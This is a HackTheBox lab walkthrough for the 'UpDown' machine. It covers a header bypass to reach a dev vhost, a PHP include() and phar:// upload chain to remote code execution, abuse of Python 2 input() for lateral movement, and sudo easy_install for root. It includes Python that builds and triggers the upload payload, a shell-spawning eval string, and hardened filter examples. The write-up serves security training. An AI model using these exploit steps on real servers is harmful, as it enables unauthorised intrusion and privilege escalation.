Beri Contraster

UpDown - HackTheBox Walkthrough



Linux - Medium

Created by AB2

Released on 03 Sep 2022


Welcome, reader. Today we'll hack UpDown from HackTheBox, a medium-difficulty Linux machine. Let's start with an Nmap scan.


Nmap Scan


It is an Ubuntu machine with only SSH and a web server exposed. Let's check the web server.



It seems like a tool that checks if the website is up or not. Let's add the domain siteisup.htb to /etc/hosts.



I pointed the tool to itself and enabled the debug mode.



The tool sent a GET request to the given address and showed the response in the debug section. There is not much here, so let's move on to virtual host fuzzing and see if we can discover anything.


Virtual Host Fuzzing


Let's add dev.siteisup.htb to /etc/hosts. The discovered virtual host returns 403 Forbidden.



Let's do some directory fuzzing on siteisup.htb with gobuster.


Directory Fuzzing


Going to /dev gives a blank page. Let's do some more fuzzing on /dev.



Going to /dev/.git lists a git repository. We can dump the repository to our attacking machine with git-dumper.




Let's take a look at the .htaccess file. This is an Apache configuration file responsible for redirecting traffic, blocking users, password-protecting directories, and other administrative functions.



FOOTHOLD

The file denies every request that does not carry the Special-Dev header with the value it expects. Let's try accessing the dev virtual host by adding this header to our requests, using Burp Suite.



Proxy -> Proxy settings -> Match and replace rules. After adding the following rule, Burp will add this header to every request going through it, which should let us access the dev vhost.



We now have a file uploader where we can upload a file containing a list of hosts to check. Let's take a look at the source code of this application which we dumped earlier.



The source code uses the PHP include() function on user input. This is risky because a user-controlled include path leads to Local File Inclusion and, combined with an upload or a stream wrapper, to Remote Code Execution. There is a filter on $_GET['page'], but it only blocks specific directories such as /etc and /home. If no page parameter is provided, the page includes checker.php. I also took a look at checker.php.



checker.php blacklists upload extensions, but it still allows .phar files. Phar is a package format for bundled PHP files and can be just as effective as regular PHP files for remote code execution.
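To make the two weaknesses concrete, here is an added Python model of the checks described above (example code, not the box's PHP source): a substring blacklist on the page parameter, an extension blacklist on uploads, and an allowlisted version of each. The blocked directories, the blocked extensions and the page names are constructed for the example; the lists in the dumped repository may differ.

```python
import re
from pathlib import PurePosixPath

# Constructed approximations of the checks the post describes (not the dumped source).
DENIED_PATH_FRAGMENTS = ("/etc", "/home")            # include() filter on ?page=
BLOCKED_EXTENSIONS = {"php", "php3", "php5", "phtml", "phps", "inc"}  # note: no "phar"


def vulnerable_page_ok(page: str) -> bool:
    """Substring blacklist: blocks a few directories but knows nothing about stream wrappers."""
    return not any(frag in page for frag in DENIED_PATH_FRAGMENTS)


def vulnerable_upload_ok(filename: str) -> bool:
    """Extension blacklist: anything not listed is accepted, including .phar and .txt."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in BLOCKED_EXTENSIONS


# Hypothetical allowlists for the hardened variants.
ALLOWED_PAGES = {"checker", "about"}
ALLOWED_UPLOAD_EXTENSIONS = {"txt"}      # a host-list upload only ever needs plain text


def hardened_page_ok(page: str) -> bool:
    """Allowlist of bare page names: no slashes, no wrappers, no traversal possible."""
    return re.fullmatch(r"[a-z0-9_]+", page) is not None and page in ALLOWED_PAGES


def hardened_upload_ok(filename: str) -> bool:
    """Allowlist the extension and reject anything that is not a plain file name.

    Caveat: phar:// reads zip/tar content whatever the file is called, so the name
    check alone does not stop the attack on this box; the real fix is that
    include() must never be able to reach the uploads directory at all.
    """
    name = PurePosixPath(filename).name
    if name != filename or name.startswith("."):
        return False
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return ext in ALLOWED_UPLOAD_EXTENSIONS


if __name__ == "__main__":
    probe = "phar://uploads/deadbeef/info.txt/info"
    print("vulnerable page filter passes wrapper:", vulnerable_page_ok(probe))
    print("hardened page filter passes wrapper:  ", hardened_page_ok(probe))
    print("vulnerable upload filter passes .phar:", vulnerable_upload_ok("shell.phar"))
    print("hardened upload filter passes .phar:  ", hardened_upload_ok("shell.phar"))
```

The point of the hardened pair is that allowlisting the page name removes the wrapper problem entirely, while the upload check only narrows the file names; the uploads directory still has to be kept out of include()'s reach.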


Let's start by creating a .php file that displays php info.



Let's pack it into a zip archive so we can use the phar:// PHP wrapper to reach the file inside it; phar:// reads zip- and tar-based archives as well as native .phar files. Specifically, we'll wrap our phpinfo() payload.



Let's upload the file. It is reachable under /uploads, inside a directory whose name is an MD5 hash, as we saw in the source code.



Now we can use the phar:// wrapper to trigger our payload by requesting http://dev.siteisup.htb/?page=phar://uploads/file_md5_hash/info.txt/info, which displays the PHP info page.
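The foothold steps above, collected into one script as an added example (this is not the post's or the box's own code): it builds the zip payload, opens a session that carries the Special-Dev header on every request, and constructs the phar:// include URL. The header value, the upload form field name and the directory hash are placeholders to be replaced with what the dumped source and the upload response give you. The member is referenced without its .php suffix because the include on the page appends ".php" to the page parameter itself, which is why the URL above ends in /info rather than /info.php.

```python
import io
import zipfile
from urllib.parse import quote

# Placeholders (not on the original page): fill in from the dumped repository.
DEV_HOST = "http://dev.siteisup.htb"
SPECIAL_DEV_HEADER = {"Special-Dev": "<value-from-.htaccess>"}
UPLOAD_FIELD = "file"          # hypothetical name of the upload form field

PHPINFO_PAYLOAD = "<?php phpinfo(); ?>"


def build_phar_zip(php_source: str, member: str = "info.php") -> bytes:
    """Return a zip archive (readable through phar://) holding one PHP file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member, php_source)
    return buf.getvalue()


def archive_members(archive: bytes) -> list:
    """List the member names inside a zip payload (for checking what was built)."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return zf.namelist()


def phar_include_url(upload_dir_hash: str, archive_name: str = "info.txt",
                     member: str = "info.php") -> str:
    """Build the ?page= URL that makes include() open the archive member via phar://.

    The include appends '.php' to the parameter, so the member is named without it.
    """
    stem = member[:-4] if member.endswith(".php") else member
    page = f"phar://uploads/{upload_dir_hash}/{archive_name}/{stem}"
    return f"{DEV_HOST}/?page={quote(page, safe='/:')}"


def dev_session():
    """A requests session that sends the Special-Dev header on every request,
    the scripted equivalent of the Burp match-and-replace rule."""
    import requests  # imported lazily so the pure helpers above need no dependency
    s = requests.Session()
    s.headers.update(SPECIAL_DEV_HEADER)
    return s


def upload_archive(session, archive: bytes, filename: str = "info.txt") -> str:
    """POST the archive as a 'host list' and return the response body; the MD5
    directory name is then read from the response or reproduced from the source's
    naming scheme (both assumptions about the page's behaviour)."""
    resp = session.post(DEV_HOST + "/", files={UPLOAD_FIELD: (filename, archive)},
                        timeout=10)
    resp.raise_for_status()
    return resp.text


if __name__ == "__main__":
    archive = build_phar_zip(PHPINFO_PAYLOAD)
    print("members:", archive_members(archive))
    print("trigger:", phar_include_url("<md5-dir>"))
    # Against the live box: s = dev_session(); print(upload_archive(s, archive))
```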



We achieved Remote Code Execution but there is another hurdle in our way. This page revealed that some PHP functions are disabled including system(), shell_exec(), and more.


I was searching for something that would help me get through this and found a tool, defunc_bypasser, which checks each dangerous function and reports the ones that are still enabled and usable for a reverse shell. We'll need to change its code so it adds the Special-Dev header when sending requests; otherwise it gets 403 Forbidden.





The tool suggests that we might be able to execute code using proc_open which is similar to popen. Let's create a reverse shell using this function.



Zip the file the same way and upload it to the web server. Triggering it through phar:// under /uploads, as before, gives us a reverse shell.



I upgraded my shell; you can copy the commands and read more about shell upgrades here.


Lateral Movement

I was doing manual enumeration before running automated scripts like Linpeas. I found a file with interesting permissions.



siteisup_test is an executable owned by the developer user that www-data can also run, so whatever it executes runs with developer's privileges. Let's look at the contents of the file.



This is a Python 2 program that calls input(), which is insecure in Python 2 because it evaluates whatever is typed as a Python expression, just like eval(), so it will execute code handed to it as a string.
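As an added illustration (not the program from the box), the following Python 3 code models what Python 2's input() does with a typed line and puts the hardened alternative beside it. The probe payload calls getpid() instead of spawning a shell so the example runs harmlessly; the shell-spawning form is shown only as a string.

```python
import ast
import os

# Python 2's input() behaves like eval(raw_input()); modelled here in Python 3.
def py2_style_input(line: str):
    """What Python 2 input() does with the typed line: evaluate it as an expression."""
    return eval(line)  # intentionally unsafe: this is the bug being demonstrated


def safe_input(line: str):
    """Hardened equivalent: only Python literals are accepted, code never runs.

    ast.literal_eval raises ValueError for anything that is not a literal.
    """
    return ast.literal_eval(line)


HARMLESS = "2 + 2"
PROBE = "__import__('os').getpid()"                   # executes, but harmlessly
SHELL_PAYLOAD = "__import__('os').system('/bin/bash')"   # the shape used against the box; not run here


def demo() -> dict:
    """Show the unsafe call executing code and the safe one refusing it."""
    result = {
        "harmless": py2_style_input(HARMLESS),
        "probe_ran": py2_style_input(PROBE) == os.getpid(),
    }
    try:
        safe_input(PROBE)
        result["safe_blocked"] = False
    except ValueError:
        result["safe_blocked"] = True
    return result


if __name__ == "__main__":
    print(demo())
```

Because the binary runs with developer's privileges, the expression typed at the prompt is evaluated as developer, which is exactly what SHELL_PAYLOAD exploits.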



Now we have a shell as the developer user. We can copy developer's private SSH key and get a more stable shell. I moved the file to my attacking machine using the Python HTTP server; you can also just copy and paste it.


After logging in as developer, I checked whether this user can run anything with root privileges, and it looks like this user can run easy_install with sudo.



Taking a quick look at GTFOBins, I found a way to escalate privileges to root using easy_install. GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions on misconfigured systems.



Thanks for reading. If you have any questions please don't hesitate to ask me.
